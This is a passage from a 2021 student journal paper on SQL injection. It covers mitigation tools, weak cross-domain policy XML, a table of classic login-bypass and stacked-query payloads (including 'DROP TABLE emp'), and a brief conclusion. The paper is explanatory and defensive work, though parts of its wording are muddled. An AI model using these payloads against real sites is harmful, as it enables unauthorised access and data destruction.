MySQL Injection. The script above will try to connect to the database of the website, hence it’s a difficult and complicated task. If the connection to the database is successful the attacker or a hacker will have full access to the database but through the client-side language.
  • 5. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 08 Issue: 01 | Jan 2021 www.irjet.net p-ISSN: 2395-0072 © 2021, IRJET | Impact Factor value: 7.529 | ISO 9001:2008 Certified Journal | Page 46 MITIGATION: - 1) Ardilla Tool uses Taint Based Approaches and Static Analysis Techniques for filters and sanitization method for detection of vulnerability. 2) Noxes Tool can also be used for the detection and prevention of XSS and SQL Injection Attack. 3) Cookie Stealing through XSS for SQL Injection Attack can be prevented by implementing Dynamic Cookie Rewriting Technique. (D) SQL Injection Attack using Cross Domain Policies of Rich Internet Application: - <allow-access-from domain=”*.sub1.domainX.com”/> <allow-access-from domain=”*.domainY.com”/> <allow-access-from domain=”*”/> The above code is an example of Weak Code for the Cross-Domain Policy. MITIGATION: - 1) FLASHOVER which uses static as well as dynamic code analysis to protect SQL Injection Cross Domain Policies. 2) DEMACRO which detects the malicious cross domain requests and tries to de-authenticate them. LANGUAGES / DATABASE STACKED QUERY TABLE: - Green : Supported; Dark Gray: Not Supported; Light Gray: Unknown Pattern String Pattern Expected Results Secure Insecure 1 ‘OR” =’ Login Failed Login Successful 2 0’or’1’=’1 Login Failed Login Successful 3 1’or’1’=’1 Login Failed Login Successful 4 ‘OR’1’=’1’ Login Failed Login Successful 5 “’or 1=1--“ Login Failed Login Successful 6 OR’1’=’1’” Login Failed Login Successful 7 Emp_id=’x’AND emp_name IS NULL Attack identified Columns retrieved 8 SELECT * FROM emp; DROP TABLE emp; Attack Identified Table employee deleted 9 SELECT TABLE_NAME FROM INFORMATION_SCHEMA TABLE Attack Identified Table name in the database
  • 6. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 08 Issue: 01 | Jan 2021 www.irjet.net p-ISSN: 2395-0072 © 2021, IRJET | Impact Factor value: 7.529 | ISO 9001:2008 Certified Journal | Page 47 5. EXPERIMENTAL RESULTS: - We have performed basic SQL Injection queries proposed by us on unprotected interface. Below mentioned table shows us the result of the analysis we have performed. 6. CONCLUSION: - In our paper, we have tried to explain various kinds of SQL Injection Attacks. They are the typical form of attacks which are done on web applications or websites. These kinds of attack are quite complex to understand. We have discussed detection and prevention techniques which are very limited as very smaller number of researches are carried out on this attack because it overcomes previous prevention and detection methods. Even the proper coding of the web applications or websites can be overcome easily. The attacker or hacker who have good knowledge of these kinds of attacks can destroy the web application which in turn will impact the business of an organization. 7. ACKNOWLEDGEMENT: - Through this research paper, I have shared enough knowledge on how a security flaws in the design implementation of database could compromise the sensitive data of the customers. I would like to thank my professors to help explore and write a research paper on this particular topic. I would like to give my gratitude to those who devoted their precious time to help me complete my research without whom it would not have been possible. 8. REFERENCES: - 1. https://cheatsheetseries.owasp.org/cheatsheets /SQL_Injection_Prevention_Cheat_Sheet.html 2. https://portswigger.net/web-security/sql- injection 3. CEH v10 Guide Book